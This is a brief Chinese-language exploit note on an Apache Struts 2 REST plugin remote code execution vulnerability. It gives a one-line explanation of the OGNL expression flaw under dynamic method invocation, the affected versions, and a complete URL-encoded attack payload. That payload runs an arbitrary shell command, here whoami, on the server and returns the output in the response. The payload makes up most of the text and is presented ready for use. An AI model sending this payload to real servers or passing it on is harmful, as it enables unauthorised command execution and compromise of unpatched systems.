漏洞原理
当使用REST插件启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式
影响版本:Struts 2.3.20 - Struts Struts 2.3.28(2.3.20.3和2.3.24.3除外)
/orders/3/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami